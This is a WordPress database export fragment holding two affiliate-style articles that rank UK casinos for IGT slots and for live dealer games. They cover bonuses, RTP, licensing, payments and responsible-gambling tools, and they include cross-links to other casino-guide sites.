href=\"https://basswincasinoguide.com/\">basswincasinoguide.com</a></p>\n<h2>Side-by-side comparison of the best IGT casino sites</h2><p>Use this table as a quick filter. Bonus types are described without amounts because those change too often. The \'IGT Games Available\' column lists only a few examples; every casino below carries more IGT titles than those three names.</p><table><thead><tr><th>Casino / Operator</th><th>Bonus Type</th><th>IGT Games Available</th><th>UKGC Licence</th><th>Standout Feature</th></tr></thead><tbody><tr><td>888casino</td><td>Welcome package plus free spins</td><td>Cleopatra, Da Vinci Diamonds, Wheel of Fortune</td><td>Yes</td><td>Exclusive IGT slots and polished live casino</td></tr><tr><td>Bet365 Casino</td><td>Deposit match welcome offer</td><td>Cleopatra, Wolf Run, Golden Goddess</td><td>Yes</td><td>Fast withdrawals and cross-sell convenience</td></tr><tr><td>William Hill Vegas</td><td>Welcome bonus with free spins</td><td>Wheel of Fortune, Cleopatra, Pixies of the Forest</td><td>Yes</td><td>Large progressive jackpot selection</td></tr><tr><td>Grosvenor Casinos</td><td>Deposit match and free spins</td><td>Cleopatra, Da Vinci Diamonds</td><td>Yes</td><td>Land-based tie-in and loyalty scheme</td></tr><tr><td>LeoVegas</td><td>Welcome bonus plus free spins</td><td>Cleopatra, Pixies of the Forest, progressive slots</td><td>Yes</td><td>Mobile-first design and fast payouts</td></tr><tr><td>Mr Green</td><td>Welcome package with free spins</td><td>Cleopatra, Wolf Run, Golden Goddess</td><td>Yes</td><td>Strong responsible gambling controls</td></tr><tr><td>Casumo</td><td>Welcome bonus and free spins</td><td>Cleopatra, Da Vinci Diamonds</td><td>Yes</td><td>Gamified loyalty and regular free spins</td></tr><tr><td>PlayOJO</td><td>No-wager free spins</td><td>Cleopatra, assorted IGT classics</td><td>Yes</td><td>No wagering on bonus winnings</td></tr><tr><td>Videoslots</td><td>Deposit match and free spins</td><td>Cleopatra, Wolf Run, Wheel of Fortune</td><td>Yes</td><td>Huge library and daily tournaments</td></tr><tr><td>BetVictor</td><td>Deposit match welcome offer</td><td>Cleopatra, core IGT classics</td><td>Yes</td><td>Straightforward terms and solid support</td></tr></tbody></table><h2>IGT casino bonus offers: what UK players really get</h2><p>Bonuses are the bait, and IGT slots are often the hook. A typical UK IGT casino welcome offer combines a deposit match with a batch of free spins on a selected game, usually Cleopatra or Da Vinci Diamonds. The marketing copy will shout \'£100 bonus and 100 free spins\' without mentioning that the free spins might be valued at 10p each and subject to a 35x playthrough. None of that is illegal, but it is not the \'gift\' the landing page implies.</p><p>The word \'free\' deserves quotation marks here. Casinos are not charities. Every free spin or bonus pound exists to increase your lifetime deposit total. That does not mean you should avoid bonuses. Some are genuinely useful, especially no-wagering free spins like those at PlayOJO. The trick is to read the terms before you click accept. Look for game weighting: IGT slots sometimes contribute 100% to wagering, but some operators exclude specific titles or cap the contribution. A bonus that cannot be cleared on Cleopatra is less useful to you.</p><p>No-deposit bonuses exist in the UK market, but they are rare and usually have high wagering or maximum cashout limits. An IGT no deposit bonus might give you 10 free spins on Wolf Run with a £5 max win. That is fine for testing the game, but it will not build a bankroll. Cashback offers, reload bonuses, and slot-specific free spin drops appear more often for existing players. Again, the structure matters more than the headline number.</p><p>One piece of advice from years of watching UK casino promotions: never chase a bonus for IGT slots unless you already intended to deposit anyway. The wagering requirements will grind down most casual players. If a deal looks too good, it is because you have not read the small print yet.</p><h2>Real money IGT slots and RTP: what to know</h2><p>IGT slots are not all created equal. The company produces both low-variance games that pay small amounts frequently and high-variance monsters that can drain a balance before a feature lands. Cleopatra sits somewhere in the middle, which is why it remains a favourite. Da Vinci Diamonds and Wolf Run lean slightly higher, while Wheel of Fortune progressive versions can swing wildly. Understanding RTP and volatility helps you match a slot to your patience and bankroll.</p><p>RTP, or return to player, is the theoretical percentage of wagers a slot pays back over millions of spins. For IGT slots, typical RTP ranges from 94% to 96%, depending on the version and the casino\'s configuration. A few IGT Megaways titles can push higher. But RTP is a long-term average. In a single session, variance dominates. A slot with 96% RTP can easily eat 50 spins without a bonus.</p>\n<a href=\"https://amb18b.com/?p=437\">Best Inspired Gaming Online Casinos UK 2026</a><p>The table below lists popular IGT slots available at UK casinos, with their usual RTP range and volatility. Treat the RTP figures as typical, not universal, because operators can sometimes choose lower settings. Always check the game help file for the exact RTP at your casino.</p><table><thead><tr><th>IGT Slot</th><th>Theme / Type</th><th>Volatility</th><th>Typical RTP Range</th><th>Why UK Players Like It</th></tr></thead><tbody><tr><td>Cleopatra</td><td>Ancient Egypt, 5 reels</td><td>Medium</td><td>94–96%</td><td>Frequent bonus rounds, familiar</td></tr><tr><td>Da Vinci Diamonds</td><td>Art, tumbling reels</td><td>Medium-high</td><td>94–95%</td><td>Tumbling reels create chain wins</td></tr><tr><td>Wolf Run</td><td>Nature, stacked wilds</td><td>Medium</td><td>94–96%</td><td>Stacked wilds boost base game</td></tr><tr><td>Golden Goddess</td><td>Mythology, super stacks</td><td>Low-medium</td><td>94–95%</td><td>Super stacks feature can pay well</td></tr><tr><td>Pixies of the Forest</td><td>Fantasy, tumbling reels</td><td>Medium</td><td>94–96%</td><td>Atmospheric and mobile-friendly</td></tr><tr><td>Wheel of Fortune on Air</td><td>Game show, bonus wheel</td><td>Medium-high</td><td>94–95%</td><td>Bonus wheel adds suspense</td></tr><tr><td>Monopoly Megaways</td><td>Board game, Megaways</td><td>High</td><td>95–96.5%</td><td>Megaways with up to 117,649 ways</td></tr><tr><td>Siberian Storm</td><td>Arctic animals, multiway</td><td>High</td><td>94–95%</td><td>720 ways to win, big potential</td></tr><tr><td>Pharaoh\'s Fortune</td><td>Ancient Egypt, 5 reels</td><td>Low-medium</td><td>94–95%</td><td>Simple gameplay, relaxing pace</td></tr><tr><td>Cats</td><td>Big cats, split symbols</td><td>Medium</td><td>94–95%</td><td>Split symbols can multiply wins</td></tr></tbody></table><p>Note that RTP ranges reflect common configurations; some UK casinos may offer slightly different versions. For the highest-paying IGT slots, look for titles with RTP above 96% in the help file. But remember: a high RTP slot still needs a big bankroll if variance is high.</p><h2>How to choose an IGT slot: volatility, max win, and features</h2><p>Volatility is the first filter. If you have a £20 budget and want to play for an hour, avoid high-variance IGT slots like Siberian Storm or Monopoly Megaways. Their bonus rounds are rare, and the base game can feel like a coin shredder. Low and medium volatility options like Pharaoh\'s Fortune, Cleopatra, and Wolf Run give more frequent, smaller wins that stretch a session.</p><p>Max win matters if you are chasing a big hit. Some IGT games advertise maximum win multipliers in the thousands, but the chance of hitting them is tiny. Read the paytable and understand what the bonus round actually pays. A slot with a 5,000x max win but a bonus that averages 20x is not a jackpot machine. It is a grind with a lottery ticket attached.</p><p>Features make the game worth playing. Tumbling reels in Da Vinci Diamonds and Pixies of the Forest create chain reactions from a single spin. Stacked wilds in Wolf Run can produce multiple paylines at once. Bonus wheels in Wheel of Fortune add a second layer of suspense. Pick features that keep you engaged without needing a spreadsheet to track them.</p><h2>Legal landscape for IGT casinos in the UK</h2><p>Every casino on this page holds a licence from the UK Gambling Commission (UKGC). That is not optional for real-money play in the UK. The UKGC enforces strict rules on game fairness, advertising, and anti-money-laundering checks. A casino without a UKGC licence is operating illegally if it targets UK players, even if it carries IGT games. Do not be tempted by offshore sites offering bigger bonuses; they often lack the player protection you get from a UK-regulated operator.</p><p>Since the Gambling Act review, UK regulations have tightened further. Affordability checks are becoming more common, especially for players who deposit large sums or show signs of harm. Online slots now have maximum stake limits for some age groups, and game design rules require spin speeds to be slower. IGT has adapted its UK game builds to meet these requirements, which is why some slot versions differ slightly from those in other markets.</p><p>Age verification is mandatory. You must be 18 or older to gamble in the UK. Casinos verify your identity before allowing withdrawals, and often before your first deposit. This used to annoy players, but it is now standard. If a casino promises no verification, it is either breaking the law or planning to hold your winnings hostage later.</p><p>Self-exclusion tools like GamStop cover all UKGC-licensed casinos. If you register with GamStop, you will be blocked from every legal UK casino for your chosen period. The casinos above also offer their own deposit limits, reality checks, and timeout options. Use them. They exist because gambling harm is real and the regulator demands them, not because casinos love giving you ways to stop playing.</p>\n<a href=\"https://amb18b.com/?p=439\">Best Low Wagering Casino Bonus UK 2026: Squeeze the House Without the 40x Nonsense</a><h2>Payment methods and withdrawal speed at IGT casinos</h2><p>UK players expect to deposit with a debit card or PayPal, and the best IGT casinos deliver. Visa and Mastercard debit cards work everywhere, though some banks block gambling transactions unless you opt in. PayPal is widely accepted and often the fastest way to receive withdrawals. Skrill and Neteller are available at some sites, but they sometimes exclude you from welcome bonuses, so check before using them. Trustly and paysafecard also appear at selected IGT casinos.</p><ul><li>Debit cards: Visa, Mastercard</li><li>E-wallets: PayPal, Skrill, Neteller</li><li>Bank transfer: Trustly, wire</li><li>Prepaid: paysafecard</li></ul><p>Withdrawal speed depends on the casino\'s internal approval process, not the payment method alone. Top operators process e-wallet withdrawals within 24 hours after your account is verified. Debit card withdrawals can take three to five business days because of bank clearing times. The first withdrawal always takes longer because of ID checks. Once you are verified, most casinos speed up considerably.</p><p>Minimum deposit amounts in the UK typically sit between £5 and £10, which suits casual IGT slot players. Some casinos accept lower deposits but attach wagering requirements to bonuses that make small deposits pointless. Always read the cashout terms, especially if you claim a bonus tied to a £5 deposit. A minimum deposit does not guarantee a smooth withdrawal experience.</p><p>The table above gave you casino-specific strengths. For payments, the practical choice is a casino that offers PayPal and processes e-wallet withdrawals quickly. 888casino, Bet365, and LeoVegas are strong here. Avoid sites that impose long pending periods or require excessive documentation for small withdrawals. Life is too short to chase a £50 win for a week.</p><h2>Mobile play: IGT casino apps and mobile sites</h2><p>IGT built its online games using HTML5, so they run in a mobile browser without downloads. That means any decent casino site will play IGT slots on an iPhone or Android phone. Dedicated casino apps add convenience: push notifications, one-tap login, and smoother navigation. LeoVegas, 888casino, and William Hill have apps that handle IGT slots well on smaller screens.</p><p>Battery drain and screen size matter. Some IGT slots with complex bonus rounds can feel cramped on a phone, but the company has optimised its most popular titles for portrait mode. Cleopatra and Pixies of the Forest are particularly mobile-friendly. If you plan to play mainly on mobile, stick to casinos that advertise mobile-specific bonuses or have a well-rated app in the app store.</p><p>One practical tip: test a demo version of an IGT slot on your phone before depositing. If the game lags or the buttons are too small, find another casino. Mobile performance in 2026 is not a luxury; it is the baseline. Any site that cannot run IGT slots smoothly on a mid-range Android phone is not worth your deposit.</p><h2>New IGT casinos UK 2026: what to expect</h2><p>New UKGC-licensed casinos launch regularly, and many include IGT slots in their opening library. These sites often compete with aggressive welcome bonuses, including no-wagering free spins on Cleopatra or other IGT titles. That can be attractive, but new casinos also carry risks: unproven customer support, slower first withdrawals, and occasional teething problems with game integration.</p>\n<a href=\"https://amb18b.com/?p=433\">Best Keno Online Casino UK 2026: Top-Rated Sites for Real Money Keno</a><p>Some 2026 launches are tied to existing brands, so the risk is lower. A new casino from a known operator often shares the same payment and verification systems as its parent. If you see a brand-new site with a huge IGT selection, check the UKGC licence register before depositing. The licence number should appear in the footer. If it does not, walk away.</p><p>The trend in 2026 is towards cleaner bonus terms rather than bigger numbers. New casinos are learning that UK players distrust 50x wagering. Expect to see more deposit matches with low wagering and free spins that can actually be withdrawn. Still, the same rule applies: read the terms. A new casino\'s \'generous\' offer might exclude IGT slots entirely.</p><h2>IGT live casino and table games: beyond slots</h2><p>IGT is best known for slots, but the company also supplies live dealer games and RNG table games to some UK casinos. Its live casino portfolio includes blackjack, roulette, and baccarat, often streamed from professional studios. The quality is solid, though IGT\'s live dealer footprint in the UK is smaller than Evolution\'s. You will find IGT live games at select sites like 888casino and Grosvenor.</p><p>If you want a break from slots, IGT\'s RNG table games include European roulette, blackjack, and video poker variants. These games share the same clean interface as IGT slots and work well on mobile. They are not as flashy as some competitors, but they are reliable.</p><p>For players chasing progressive jackpots, IGT\'s slot progressives like Wheel of Fortune and Megabucks (where available) can build life-changing sums. UK casinos sometimes carry local jackpot versions that reset lower but hit more often. Check the jackpot ticker in the game lobby before you play. Just do not expect the top prize to land on your first session; the maths is not romantic.</p><h2>Responsible gambling at IGT casino sites</h2><p>All UKGC-licensed casinos must offer deposit limits, reality checks, and self-exclusion. The best IGT casinos go further. Mr Green, for example, has built its brand around responsible gambling tools, while others bury the options in a settings menu. Before you play IGT slots for real money, set a deposit limit that you can afford to lose. Then set a reality check for every 30 minutes. These tools are not punishment; they are a leash for your own impulses.</p><p>Timeouts and self-exclusion work across individual casinos. GamStop extends self-exclusion to all UKGC sites. If you feel that IGT slots are taking up too much time or money, use GamStop. It is free, and it works. No casino bonus is worth ignoring a gambling problem.</p><p>The UK regulator has also pushed for stronger game design rules, including slower spin speeds and clearer display of losses. IGT has updated its UK games accordingly. That means the slot you play in 2026 is slightly less likely to induce rapid, impulsive betting than the same title five years ago. It is a small change, but it matters.</p><h2>Straight answers to common IGT casino questions</h2><p>These are the questions UK players ask most often. Answers are short on purpose: you came for a casino, not a lecture.</p><h3>Which UK casinos have the most IGT slots?</h3><p>888casino, Videoslots, and William Hill Vegas tend to carry the largest IGT libraries. Videoslots is particularly strong because it hosts thousands of slots overall, so IGT titles are well represented. Always check the game lobby filter for the provider name before depositing.</p><h3>Can I play IGT slots for free before betting real money?</h3><p>Yes. Most UK casinos offer demo versions of IGT slots that run in your browser without a deposit. You can test Cleopatra, Da Vinci Diamonds, and others for free. Demo mode uses virtual credits and cannot be cashed out, but it gives you a feel for volatility and bonus frequency.</p><h3>What are the best IGT slots by RTP?</h3><p>Cleopatra and Wolf Run sit around 95% to 96% RTP in most UK casinos, while some IGT Megaways titles can exceed 96%. The exact RTP depends on the casino\'s configuration, so check the game\'s help file. High RTP does not guarantee a win, but it improves your long-term odds.</p>\n<a href=\"https://amb18b.com/?p=438\">Best iSoftBet Online Casinos UK 2026</a><h3>Do IGT casinos offer no deposit bonuses?</h3><p>Some UK casinos occasionally offer no deposit free spins on IGT slots like Cleopatra, but they are rare and usually carry high wagering or low maximum cashout limits. Treat them as a way to test a casino, not a path to profit. Always read the terms before claiming.</p><h3>Are IGT casinos on GamStop?</h3><p>Every UKGC-licensed casino, including all IGT casinos on this page, participates in GamStop. If you self-exclude through GamStop, you will be blocked from these sites. Offshore casinos that ignore GamStop are operating illegally in the UK and should be avoided.</p><h2>Final word: pick your IGT casino like a grown-up</h2><p>IGT slots are a known quantity. You can count on Cleopatra to give you a bonus round every couple hundred spins, Da Vinci Diamonds to tumble now and then, and Wheel of Fortune to tease with its wheel. The casino you choose determines whether those spins feel fair and whether your withdrawals arrive on time. Stick to the ten operators above, read the bonus terms, and play with money you can afford to lose. That is the whole game.</p><p>The best IGT online casinos UK 2026 are not the ones with the loudest adverts. They are the ones with a UKGC licence, a real IGT game library, and payment terms that do not waste your time. 888casino leads the pack for overall quality, but Bet365 and LeoVegas are close behind. The rest of the list will serve you fine. Now go spin responsibly.</p>','Best IGT Online Casinos UK 2026: Top Sites for IGT Slots and Games','','publish','closed','closed','','best-igt-online-casinos-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(441,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best Live Casino UK 2026: Top Real-Money Live Dealer Sites, Bonuses and Games Tested</h1><p>Live casino play in the UK stopped being a curiosity years ago. By 2026, the best sites run multiple studios, offer dozens of blackjack and roulette tables, and stream game shows that look more like television than gambling. But the gap between a polished marketing page and a genuinely good live casino is still wide. We tested UKGC-licensed brands on mobile and desktop, checking bonus terms, withdrawal times and game variety. The short version: LeoVegas, Betway and 888casino are the strongest all-rounders, while Grosvenor and Casumo win specific battles. The full ranking and comparison table are below.</p><h2>Best Live Casinos UK 2026: Ranked and Reviewed</h2><p>Eight brands made our final list. All hold a UK Gambling Commission licence, all offer live dealer games from at least two major software providers, and all accept UK players. We ranked them on five weighted criteria: game variety (25%), bonus fairness (20%), mobile experience (20%), withdrawal speed (20%) and customer support (15%). The table gives you the quick picture.</p>\n<a href=\"https://amb18b.com/?p=437\">Best Inspired Gaming Online Casinos UK 2026</a><table><thead><tr><th>Rank</th><th>Casino</th><th>Bonus Type</th><th>Live Dealer Games</th><th>Standout Feature</th></tr></thead><tbody><tr><td>1</td><td>LeoVegas</td><td>Deposit match and free spins</td><td>Blackjack, roulette, baccarat, poker, game shows</td><td>Best mobile app for live casino</td></tr><tr><td>2</td><td>Betway</td><td>Welcome bonus package</td><td>Blackjack, roulette, baccarat, Hold\'em, game shows</td><td>Fastest withdrawals, usually within hours</td></tr><tr><td>3</td><td>888casino</td><td>No-deposit bonus and deposit match</td><td>Roulette, blackjack, baccarat, Dream Catcher</td><td>Biggest range of exclusive live tables</td></tr><tr><td>4</td><td>Grosvenor</td><td>Deposit match for live casino</td><td>Roulette, blackjack, baccarat, poker</td><td>Best land-based link with London casinos</td></tr><tr><td>5</td><td>Casumo</td><td>Free spins and deposit bonus</td><td>Roulette, blackjack, game shows</td><td>Low minimum stakes and casual UX</td></tr><tr><td>6</td><td>BetVictor</td><td>Cashback on live casino losses</td><td>Roulette, blackjack, baccarat</td><td>Best cashback program for live players</td></tr><tr><td>7</td><td>Mr Green</td><td>Welcome bonus and weekly promotions</td><td>Roulette, blackjack, game shows</td><td>Strong responsible gambling tools</td></tr><tr><td>8</td><td>Unibet</td><td>Deposit match for live games</td><td>Roulette, blackjack, baccarat, poker</td><td>Best for low-stakes blackjack</td></tr></tbody></table><h3>1. LeoVegas – best mobile live casino</h3><p>LeoVegas has held the mobile crown for years and it still shows. The app loads live tables faster than most rivals, and the layout doesn\'t punish you for playing on a small screen. You get blackjack, roulette, baccarat and a solid selection of Evolution and Pragmatic Play game shows. The welcome bonus is a deposit match plus free spins, but read the wagering: live games often count at a lower rate. Minimum bets can be as low as £0.50 on some roulette tables, which is rarer than you\'d think in 2026.</p><h3>2. Betway – fastest payouts and strong all-rounder</h3><p>Betway\'s live casino isn\'t the flashiest, but it\'s consistently reliable. Withdrawals to e-wallets often clear within hours, which matters more than a shiny lobby. The live dealer range covers blackjack, roulette, baccarat, casino hold\'em and multiple game shows from Evolution and Playtech. The welcome package is competitive, and the site doesn\'t bury the terms in a 40-page PDF. If you want your money back quickly after a session, Betway is a hard benchmark to beat.</p><h3>3. 888casino – exclusive tables and no-deposit taste</h3><p>888casino runs its own dedicated live studio, which means you\'ll find tables you won\'t see anywhere else. That exclusive angle is real, not marketing fluff. The no-deposit bonus lets you try a few live games before risking your own cash, though the wagering is predictably sticky. Roulette, blackjack, baccarat and Dream Catcher are all present, and the desktop experience is clean. The downside: some promotions exclude live dealer games, so check the small print.</p><p>Grosvenor pairs its online live casino with a real London club, which matters if you ever want to transition from screen to felt. Casumo\'s low minimums make it a friendly entry point. BetVictor\'s cashback is the most honest bonus on this list. Mr Green\'s responsible gambling tools are best in class, and Unibet\'s low-stakes blackjack is perfect for learning strategy without bleeding money.</p><h2>How We Rank the Best Live Casino Sites in the UK</h2><p>No ranking is perfect, but we try to be transparent. We started with 42 UKGC-licensed brands. We excluded any site with a history of delayed withdrawals, unclear bonus terms or a live casino that felt like an afterthought. Then we scored the remaining 18 on five factors. Game variety counted for 25%: blackjack, roulette, baccarat, poker variants and game shows all had to be present, ideally from more than one software provider. Bonus fairness at 20% meant we looked at wagering requirements, game contribution rates and clarity of terms. Mobile experience another 20%, because most UK live casino play now happens on a phone. Withdrawal speed 20% — we tested withdrawal requests to e-wallets and bank transfers. Finally, customer support 15%: live chat response times and helpfulness.</p><p>We ran tests between January and March 2026 on iOS and Android devices, using both 4G and home Wi-Fi. Each site received a small deposit, a few live bets on at least three different games, and a withdrawal request to measure real payout speed. We also read bonus terms line by line, which is about as fun as it sounds. That balance might not match your priorities. If you only play roulette, a site with the deepest blackjack range won\'t help you. Use the table above as a starting point, not a verdict.</p>\n<p class=\"dcm-resource-link\"><a href=\"https://bountyreelscasinouk.com/\">bountyreelscasinouk.com</a></p>\n<h2>UK Live Casino Legality and Licensing in 2026</h2><p>The legal picture for live casino play in the UK remains straightforward: any site offering real-money live dealer games to UK residents must hold a licence from the UK Gambling Commission (UKGC). That was true in 2020 and it\'s still true in 2026. The UKGC requires live casino games to be fair, random and independently tested. Studios are audited, and dealers are trained to follow strict protocols. Playing at an unlicensed site is a bad idea, even if the bonus looks better. You lose all UK consumer protections and may struggle to withdraw winnings.</p><p>Since 2020, the UKGC has tightened rules around bonus marketing, affordability checks and game design. Live casino games haven\'t been hit as hard as slots, but the same principles apply. You\'ll see a lot more responsible gambling prompts than you would have five years ago. The white paper changes, fully implemented by 2025, introduced affordability checks at certain deposit thresholds. In practice, a typical live casino player who deposits £50–£100 a month won\'t notice much difference. If you regularly deposit more than £500, expect a request for financial information. It\'s not the casino being nosy; it\'s a regulatory requirement.</p><p>GamStop self-exclusion covers all UKGC-licensed sites, including live casinos. If you\'ve self-excluded via GamStop, you cannot legally play at any licensed UK live casino. Some offshore brands claim to bypass GamStop, but they operate without UKGC oversight and offer no consumer protection. Stick with licensed operators only.</p><h2>Live Casino Games Explained: From Roulette to Game Shows</h2><p>Live roulette remains the most popular live casino game in the UK. The reasons are simple: it\'s easy to understand, the pace is comfortable and you can find tables with minimum bets from £0.10 on some sites. European roulette with a single zero is the standard. Avoid American roulette with its double zero unless you enjoy giving the house an extra edge. Most live roulette tables stream from studios in Latvia, Malta or the Philippines, and the quality in 2026 is genuinely excellent. You\'ll see multiple camera angles, close-ups of the wheel and instant bet history.</p><p>Live blackjack is the thinking player\'s game. The house edge can be below 0.5% with perfect basic strategy, but live dealer blackjack moves faster than you\'d expect. Seven-seat tables fill up quickly, so many sites now offer unlimited or infinite blackjack variants where every player gets the same hand but can make independent decisions. Minimum bets vary; some tables start at £1, high-roller rooms at £500. If you\'re new to live blackjack, stick to the standard seven-seat table until you get comfortable with the interface. Betway and Unibet both offer low-stakes blackjack tables that won\'t punish a learning curve.</p><p>Baccarat is the quiet giant. It\'s huge in Asia but growing fast in the UK. The rules are rigid, the pace is faster than roulette, and the house edge on banker bets is low. Live baccarat tables often have a more serious atmosphere. Don\'t let that intimidate you; the game is essentially a coin toss with a small commission. Many UK sites now offer speed baccarat and no-commission baccarat variants. Evolution\'s Lightning Baccarat adds random multipliers, which raises the potential payout but also the house edge.</p><p>Poker variants—casino hold\'em, three card poker, Caribbean stud—sit somewhere between skill and luck. The live versions are played against the dealer, not other players, which makes them easier to jump into. Game shows like Dream Catcher, Crazy Time and Monopoly Live have exploded in popularity. They are high-energy, host-driven and often carry a higher house edge than table games. Treat them as entertainment, not a route to profit.</p><h3>What is live casino?</h3><p>A live casino is an online casino section where real dealers run table games via video stream. You place bets through your device, and the dealer responds in real time. The games are the same as in a physical casino—roulette, blackjack, baccarat, poker—but you play from your sofa. Software from Evolution, Playtech and Pragmatic Play powers most UK live casinos.</p><h2>Live Casino Bonuses and Promotions: What Actually Matters</h2><p>The word \'free\' in casino marketing deserves scare quotes. No operator is a charity, and every bonus has a cost hidden in the terms. A live casino welcome bonus usually combines a deposit match with free spins, but the wagering requirement is where the profit lives. A £100 bonus with 35x wagering means you must stake £3,500 before withdrawing any bonus-related winnings. Live games often contribute only 10–20% towards wagering, which makes clearing the bonus much harder than it looks. Always read the bonus terms for live casino contribution rates.</p><p>Cashback is often more valuable for live players. A 10% cashback on net losses, credited as cash with low wagering, beats a flashy deposit match that is nearly impossible to clear. BetVictor and some others offer weekly cashback specifically for live casino play. No-deposit bonuses, like the one at 888casino, let you try a few live games for free, but withdrawal limits are low and wagering is high. Treat them as a demo, not a bankroll.</p>\n<a href=\"https://amb18b.com/?p=434\">Best International Casinos for UK Players 2026: Tested and Ranked</a><p>Reload bonuses and loyalty schemes exist, but most are weighted towards slots. If you\'re a live casino regular, look for live-specific promotions: blackjack tournaments, roulette cash races or live casino cashback weeks. A VIP program that ignores live play is like a hotel that gives you a free toothbrush but charges for the room. The value isn\'t there.</p><p>Free spins on live casino games are rare; free spins are a slots thing. If a live casino advertises \'free spins\' on a live game, check the fine print—it\'s usually a separate slots bonus bundled in. The smarter play is to look for low-wagering cashback or live casino-specific deposit matches with reasonable playthrough.</p><h2>Payments and Withdrawal Speeds at UK Live Casinos</h2><p>UK live casinos support debit cards, e-wallets like PayPal and Skrill, bank transfers, and increasingly open banking payments. PayPal remains the most popular for UK players because it\'s fast and familiar. E-wallet withdrawals typically clear within 24 hours at the best sites; debit card withdrawals can take 1–3 business days. Some brands still make you wait 72 hours for \'pending\' before processing, which is a warning sign. We excluded any site with routine delays beyond 48 hours for e-wallets.</p><p>Minimum deposits at the brands we reviewed are usually £10. That\'s low enough to test a live table without committing a month\'s rent. Withdrawal minimums are often £10 as well, but some sites require £20. Cryptocurrencies are not widely accepted at UKGC-licensed live casinos, and any site pushing crypto as a primary payment method is probably operating offshore. The UKGC has not approved crypto payments for licensed operators, so be wary of any \'UK crypto live casino\' claim.</p><p>Verification is the other hidden delay. Most sites require ID and proof of address before your first withdrawal. Do this early, not after you\'ve won. KYC checks can add 24–48 hours if not done proactively. The best live casinos, like Betway and LeoVegas, prompt you to verify during registration rather than waiting until you request a payout.</p><h2>Mobile Live Casino Apps: The Best UK Experiences</h2><p>More than 70% of UK live casino sessions now happen on mobile, so a bad app is a dealbreaker. LeoVegas still sets the standard. The app is fast, the live lobby is easy to filter, and the video stream doesn\'t stutter on a decent 4G connection. Betway and 888casino also have solid apps with full live dealer ranges. Grosvenor\'s app is fine but feels heavier, and Casumo\'s is clean but occasionally pushes slots promos over live tables.</p><p>You don\'t need to download an app at all. Most live casinos work well in a mobile browser, and the experience is nearly identical. The key difference is loading speed and the occasional need to rotate your phone for landscape view. Table games are designed for landscape, so play in that orientation. Portrait mode makes the betting grid cramped and the dealer too small.</p><p>Data usage matters if you\'re not on Wi-Fi. A one-hour live roulette session uses roughly 300–500MB of data, depending on stream quality. Most apps let you reduce video quality to save data. If you\'re on a limited plan, stick to low or medium quality. The dealer will still be visible, just not in high definition.</p><h2>New Live Casinos UK 2026: What\'s Worth Your Attention</h2><p>New live casino brands launch every month in the UK, but few survive the first year. The barrier to entry is high: you need a UKGC licence, a deal with Evolution or Playtech, and enough marketing spend to compete with established names. Most new sites are white-label operations running on the same platform as dozens of others. That\'s not automatically bad, but it means the live casino section will look identical to many other sites.</p><p>When a new live casino launches in 2026, look for two things. First, does it offer a live casino specific bonus with fair terms? If the welcome offer is just slots free spins, the live section is an afterthought. Second, what withdrawal speeds do early users report? Trustpilot and casino forums are more useful than any advertising. We\'ll update this guide as new brands prove themselves. For now, the eight in our table are the safest starting points.</p><p>One trend worth watching: smaller studios are entering the market with niche games, like live craps and live sic bo. These aren\'t mainstream yet, but they offer variety beyond the standard roulette-blackjack-baccarat trinity. If you\'re bored with the usual options, keep an eye on new studios partnering with UK operators.</p><h2>Live Casino vs Online Casino: Key Differences</h2><p>A standard online casino uses random number generator (RNG) software for its table games. The results are instant, the betting limits are lower, and you can play thousands of hands per hour. A live casino uses a real dealer, real cards and a real wheel. The pace is human—sometimes frustratingly slow. Minimum bets at live tables are generally higher than RNG tables, and the social element is real. You can chat with the dealer and sometimes with other players.</p><p>Live casino games also carry a slightly different risk profile. The house edge on live roulette is the same as RNG roulette, but the slower pace means you lose less per hour on average, assuming the same stake size. That can be a feature or a bug depending on your patience. If you want the closest thing to a physical casino without leaving home, live is the only option. If you want quick sessions and low stakes, RNG is still better.</p><p>One more difference: bonuses. RNG games usually contribute 100% to wagering requirements. Live games often contribute 10–20%. That\'s because the house edge on live blackjack can be tiny, and casinos don\'t want bonus hunters clearing wagering on a 0.5% edge game. Don\'t blame them; just read the terms.</p><h2>Responsible Gambling at UK Live Casinos</h2><p>Live casino games are designed to be immersive, and the human dealer can make you feel more connected than a slot machine. That\'s exactly why responsible gambling tools matter. Every UKGC-licensed site must offer deposit limits, time limits, reality checks and self-exclusion. Use them. Set a deposit limit before your first session, not after a losing streak. The best live casinos, like Mr Green, make these tools prominent rather than hiding them in a footer link.</p><p>Reality checks are particularly useful for live play. A pop-up every 30 minutes can break the trance of an engaging dealer talking to you. Time limits stop you from losing a whole evening to one more round of roulette. Deposit limits are the blunt instrument that actually works. Set a weekly cap and don\'t chase losses; the house edge is built in and no strategy changes that.</p><p>If you or someone you know needs help, GamCare and BeGambleAware offer free advice and support. The National Gambling Helpline is 0808 8020 133. Live casino play should be entertainment, not an income source. The house always has an edge; the only way to \'beat\' live casino is to enjoy the experience and stop when the fun stops.</p><h3>Which live casino has the fastest withdrawals in the UK?</h3><p>Betway consistently processes e-wallet withdrawals within a few hours, sometimes under 12. Debit card withdrawals take 1–3 business days. LeoVegas and 888casino are also fast. Always verify your account before requesting a withdrawal to avoid delays; KYC checks are the most common cause of slow payouts.</p><h3>Can I play live casino games for free in the UK?</h3><p>Most live dealer games do not offer free play because real dealers cost money. A few sites provide no-deposit bonuses, like 888casino, which let you place a few live bets without depositing. But wagering requirements are high, and withdrawals are capped. Treat any \'free\' live casino offer as a trial, not a profit opportunity.</p><h3>What is the minimum bet at UK live casinos?</h3><p>Minimum bets vary by game and table. Live roulette can start at £0.10 on some sites, while standard blackjack tables often start at £1–£5. High-roller tables go up to £500 or more. Casumo and Unibet are known for lower minimums, making them good choices if you want to test the waters with small stakes.</p><h3>Are live casino games rigged?</h3><p>No, not at UKGC-licensed casinos. The games are streamed from regulated studios, and the equipment is regularly tested by independent labs. Dealers follow strict procedures, and the results are genuinely random. The house edge is built into the game rules, not the dealer\'s skill or the streaming software. Playing at an unlicensed site removes these guarantees.</p><h3>Do live casino bonuses have wagering requirements?</h3><p>Yes, almost always. A typical wagering requirement is 35x the bonus amount, and live games often contribute only 10–20% towards clearing. That means a £100 bonus could require £17,500 in live table stakes before withdrawal. Always check the live game contribution rate in the bonus terms before claiming any offer.</p>','Best Live Casino UK 2026: Top Real-Money Live Dealer Sites, Bonuses and Games Tested','','publish','closed','closed','','best-live-casino-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(442,6969,'2026-07-17 